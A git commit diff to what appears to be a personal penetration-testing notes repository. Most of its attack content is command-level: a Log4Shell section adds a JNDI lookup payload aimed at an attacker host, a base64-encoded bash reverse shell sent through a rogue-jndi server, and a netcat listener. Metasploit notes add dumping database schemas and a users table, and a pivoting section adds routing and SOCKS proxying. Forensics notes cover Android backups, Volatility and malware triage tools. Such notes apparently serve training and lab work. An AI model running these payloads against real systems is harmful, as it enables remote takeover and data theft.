bump

2022-12-12 20:03:55 +01:00 · 2022-12-12 20:03:55 +01:00 · 806c652158
parent 451631aefb
commit 806c652158
7 changed files with 90 additions and 0 deletions
--- a/Exploits/Java/Log4Shell.md
+++ b/Exploits/Java/Log4Shell.md
@ -131,3 +131,35 @@ ${${::-j}ndi:rmi://attackerendpoint.com/}
 SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
 10.10.90.21210.10.90.212
 ```
+
+## Tipps, Tricks & other Tools
+
+* Use tcpdump to catch a possible connection
+```sh
+tcpdump -i <interface> port 389
+```
+    * While the payload may look like this
+```java
+"${jndi:ldap://$ATTACKER_IP/check}"
+```
+
+### Use Veracode's Tools
+
+* Clone [veracode's rogue-jndi](https://github.com/veracode-research/rogue-jndi) and build jar with maven
+```sh
+cd rogue-jndi
+mvn package
+```
+* Prepare a reverse shell
+```sh
+echo 'bash -c bash -i >& /dev/tcp/$ATTACKER_IP/4711 0>&1' | base64
+```
+* Run the server
+```sh
+java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<prepared_rev_shell>}|{base64,-d}|{bash,-i}" --hostname "$ATTACKER_IP"
+```
+* Select and use the payload from the displayed strings
+* Catch the reverse shell with something like netcat
+```sh
+nc -lvnp 4711
+```
--- a/Exploits/Web/WASM.md
+++ b/Exploits/Web/WASM.md
@ -0,0 +1,12 @@
+# Web Assembly
+
+## Debugger
+
+Use live debuggin capabilities of [Cetus](https://github.com/Qwokka/Cetus.git). Install it through chrome://extensions. After the installation, Cetus is located in the dev tools as a tab
+
+### Cetus Search function
+
+* Search for modified values and get their address values
+* Do a differential search -> search once without any value followed by a search where the operator (LT, NE, GT) is changed, still without a value in the search field. 
+
+
--- a/Forensics/Android.md
+++ b/Forensics/Android.md
@ -0,0 +1,8 @@
+# Android
+
+## Android Backups
+
+* Restore a backup by making a tar file out of it via
+```sh
+( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 backup.ab ) |  tar xfvz 
+```
--- a/Forensics/Malware.md
+++ b/Forensics/Malware.md
@ -0,0 +1,9 @@
+# Malware
+
+## Tools
+
+[Detect is Easy | DIE](https://github.com/horsicq/Detect-It-Easy)
+
+* Analyze with `capa <binary>`
+* Unpack with `upx`
+* Re-analyze after deleting the cache `del <binary>.viv`
--- a/Forensics/Volatility.md
+++ b/Forensics/Volatility.md
@ -56,6 +56,7 @@ volatility -f <file.iso> windows.vadyarascan
 * Dump memory map
 ```sh
 volatility -f <file.iso> windows.memmap.Memmap --pid <pid> --dump
+volatility -f <file.iso> windows.dumpfiles --pid <pid>
 ```

 * Dump and scan files 
--- a/Miscellaneous/Metasploit.md
+++ b/Miscellaneous/Metasploit.md
@ -12,6 +12,7 @@
 * __Post__ postexploitation

 ## Notes        
+
 * Search via scope 
 ```sh
 search type:auxiliary <stuff>
@ -26,10 +27,12 @@ run -z
 * Flush via `unset all`

 ## Sessions
+
 * `background` or `ctrl+z`
 * Foreground via `sessions -i <number>`

 ## Scanning
+
 * Portscan
 ```sh
 search portscan
@ -41,6 +44,7 @@ search portscan
 * HTTP version `scanner/http/http_version`

 ## Database
+
 * Start postgres
 * `msfdb init`
 * `db_status`
@ -50,11 +54,27 @@ search portscan
 * Show `services`
 * Set RHOST values via `hosts -R`

+### Database Operations
+
+* Dump schemas
+```sh
+use auxiliary/scanner/postgres_schemadump
+run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres 
+```
+
+* Select table
+```sh
+use auxiliary/admin/postgres/postgres_sql
+run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres sql='select * from users'
+```
+
 ## Exploits
+
 * `show targets`
 * `show payloads`

 ## Reverse Shells
+
 * Multihandler, set options
 ```sh
 use exploit/multi/handler
@ -66,6 +86,7 @@ use multi/http/apache_mod_cgi_bash_env_exec
 ```

 ## Post Exploitation
+
 * `load kiwi`
 * `load python`
 * Windows
@ -82,6 +103,7 @@ use multi/http/apache_mod_cgi_bash_env_exec
    * `use post/linux/gather/hashdump`

 ## Other Meterpreter stuff
+
 * Staged and in disguise running as another servicename
 ```
 getpid
--- a/Exploitation/Pivoting.md
+++ b/Exploitation/Pivoting.md
@ -197,6 +197,7 @@ portfwd add -l 22 -p 22 -r 127.0.0.1
 run get_local_subnets 
 background 
 route add 10.1.1.0 255.255.255.0 1
+route add 172.10.0.1/32 -1
 route print
 ```
 * Or use `load auto_add_route` from [rapid7's documentation](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/)
@ -219,6 +220,11 @@ run
 use auxiliary/server/socks_proxy
 ```
 * Set proxychain on attacker accordingly
+```sh
+run srvhost=127.0.0.1 srvport=9050 version=4a
+curl --proxy socks4a:localhost:9050
+proxychains -q nmap 10.10.47.11
+```

 ### rpivot